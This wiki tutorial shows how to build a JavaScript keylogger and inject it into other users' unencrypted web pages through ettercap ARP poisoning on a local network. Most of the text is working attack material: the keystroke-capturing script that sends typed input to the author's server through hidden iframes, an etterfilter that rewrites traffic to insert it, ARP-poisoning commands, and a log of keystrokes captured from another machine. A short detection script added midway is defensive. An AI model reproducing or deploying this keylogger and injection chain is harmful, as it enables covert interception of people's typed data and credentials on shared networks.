
Javascript Keylogger


Download

Introduction

Okay, so, up above I've included all the source files necessary for this tutorial. I made this for fun, because I think it's a neat trick. Don't use it to indiscriminately steal people's information.

Basically we're going to host the files 'k.php' and 'k.js' on our own web server and use a MITM attack with ettercap to inject references to 'k.js' in every non-encrypted web page that passes through the network. 'k.js' simply captures keystrokes and sends them back to 'k.php' where they're stored neatly in a database. For this step-by-step I'll assume you're using Ubuntu 12.04 (because it's what I'm using). If you're not using that, you should still be able to make this all work rather easily.

I'm going to assume that you already know how to set up a web server and have one up and running. If not try googling 'xampp'.

Let's get started:

Step 1 :: Install SQLite3

  sudo apt-get install php5-sqlite

Step 2 :: Copy the contents of k_log_js to the root of your web server

  ls /var/www/
  > AUTHOR  k.filter  k.js  k.php  k.sql   

Step 3 :: Edit any server references and replace them with your own address

Source of k.js:

  var url='http://192.168.1.83'; //Replace this line

  //Frames are inserted into the page for communication with our remote server.  This avoids most security measures.
  function makeFrame(addr,data) {
     ifrm = document.createElement("IFRAME");
     ifrm.setAttribute("src", addr+data);
     ifrm.style.width = 1+"px";
     ifrm.style.height = 1+"px";
     document.body.appendChild(ifrm);
  }

  function keyHandler(e)
  {
     var pressedKey;

     pressedKey = e.charCode || e.keyCode;
     pressedCharacter = String.fromCharCode(pressedKey);
     keyGlobal = keyGlobal+pressedCharacter;

     //Send our data whenever the buffer contains 4 characters or the user presses enter
     if(keyGlobal.length >= 4 || pressedKey == 13)
     {
        makeFrame(url+'/k.php?k=',keyGlobal);
        keyGlobal = '';
     }
  }

  //our keystroke buffer
  var keyGlobal = '';

  document.onkeypress = keyHandler;

Step 4 :: Set up our database

  touch k.db
  
  sqlite3 k.db
  sqlite> .read k.sql
     

Step 5 :: Install libnet and ettercap

I compiled them from source.

I've included the files here out of the goodness of my heart: libnet-1.1.6.tar.gz and ettercap-0.7.4.1.tar.gz.

  sudo apt-get install flex
  sudo apt-get install bison
  tar xvzf libnet-1.1.6.tar.gz
  cd libnet-1.1.6
  ./configure --prefix=/usr/ && make
  make install
  cd ..

  tar xvzf ettercap-0.7.4.1.tar.gz
  cd ettercap-0.7.4.1
  ./configure
  make && make install


Step 6 :: Edit our etterfilter

This filter rewrites any HTTP traffic passing through the poisoned network so that every page carries a reference to k.js. The first block mangles the client's Accept-Encoding header so the server replies with uncompressed HTML that the second block can edit.

k.filter:

  if (ip.proto == TCP && tcp.dst == 80) {
     if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Derpde-Herpderp");
     }
  }
  //alter src='' to your own server address
  if (ip.proto == TCP && tcp.src == 80) {
     replace("<head>", "<head> <script src='http://192.168.1.83/k.js'></script> ");
     replace("<input", "<input onkeypress=keyHandler(e) ");
  }
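
Seen from the defender's side, this filter leaves two fingerprints that a web server or IDS can look for: requests that arrive with the header rewritten to "Derpde-Herpderp" in place of Accept-Encoding (no browser sends that name), and responses whose <head> opens with a script loaded from a host other than the site itself, plus the onkeypress attribute stuffed into every <input>. The checker below is an added example and not part of the original tutorial; the request, the HTML and the origin host example.test are constructed samples.

```python
import re
from typing import List
from urllib.parse import urlparse

# Constructed sample traffic for the demo, not real captures.
CLIENT_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Derpde-Herpderp: gzip, deflate\r\n"   # what Accept-Encoding becomes after the filter
    "User-Agent: Mozilla/5.0\r\n\r\n"
)

SERVER_RESPONSE_BODY = (
    "<html><head> <script src='http://192.168.1.83/k.js'></script> "
    "<title>Example</title></head>"
    "<body><form><input onkeypress=keyHandler(e)  name='q'></form></body></html>"
)

# A script tag sitting directly after <head>, exactly where the filter splices it in.
SCRIPT_AFTER_HEAD = re.compile(r"<head>\s*<script\s+src=['\"]?(https?://[^'\"\s>]+)", re.I)
# The inline handler the filter adds to every <input>.
INJECTED_ATTR = re.compile(r"<input[^>]*\bonkeypress=keyHandler\(e\)", re.I)


def request_indicators(raw_request: str) -> List[str]:
    """Flag a request whose Accept-Encoding header was rewritten upstream."""
    findings = []
    header_lines = raw_request.split("\r\n")[1:]          # drop the request line
    names = {h.split(":", 1)[0].strip().lower() for h in header_lines if ":" in h}
    if "derpde-herpderp" in names:
        findings.append("mangled Accept-Encoding header (etterfilter signature)")
    return findings


def response_indicators(html: str, origin_host: str) -> List[str]:
    """Flag HTML that carries the injected script tag or the injected input handler."""
    findings = []
    m = SCRIPT_AFTER_HEAD.search(html)
    if m and urlparse(m.group(1)).hostname != origin_host:
        findings.append("foreign script injected at <head>: " + m.group(1))
    if INJECTED_ATTR.search(html):
        findings.append("keyHandler onkeypress attribute injected into <input>")
    return findings


if __name__ == "__main__":
    print(request_indicators(CLIENT_REQUEST))
    print(response_indicators(SERVER_RESPONSE_BODY, "example.test"))
```

Because the filter only matches tcp.dst == 80, serving the site over HTTPS removes the injection point entirely; these checks are for spotting attempts against pages that are still served in the clear.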
      

Step 7 :: Compile the etterfilter

  etterfilter k.filter -o k.ef

Step 8 :: Start ARP Poisoning the network and load our filter

  sudo ettercap -T -q -F k.ef -M ARP // //

  >Listening on eth0... (Ethernet)

  eth0 ->       08:00:27:57:45:1D      192.168.1.83     255.255.255.0

  SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
  Privileges dropped to UID 65534 GID 65534...

  0 plugins (disabled by configure...)
  40 protocol dissectors
  55 ports monitored
  7587 mac vendor fingerprint
  1766 tcp OS fingerprint
  2183 known services

  Randomizing 255 hosts for scanning...
  Scanning the whole netmask for 255 hosts...
  * |==================================================>| 100.00 %

  8 hosts added to the hosts list...

  ARP poisoning victims:

  GROUP 1 : ANY (all the hosts in the list)

  GROUP 2 : ANY (all the hosts in the list)
  Starting Unified sniffing...

That's it. Now let's test it out. I visit facebook.com and check the page source. Sure enough, our script reference is there:

Then I type something in the search bar:

I open the database with the sqlite3 viewer and, sure enough, the keystrokes have been recorded. Note that the logged IP address is 192.168.1.89 while my server is running at 192.168.1.83, so the keystrokes were captured from a remote host. :)

  sqlite3 k.db
  
  sqlite> select * from k_log;
  2012-10-21 21:29:25|192.168.1.89|hSea
  2012-10-21 21:29:26|192.168.1.89|rchi
  2012-10-21 21:29:27|192.168.1.89|ng f
  2012-10-21 21:29:27|192.168.1.89|or t
  2012-10-21 21:29:28|192.168.1.89|hing
  2012-10-21 21:29:29|192.168.1.89|s...  


javascript_keylogger.txt · Last modified: 2013/01/15 11:54 by mphillips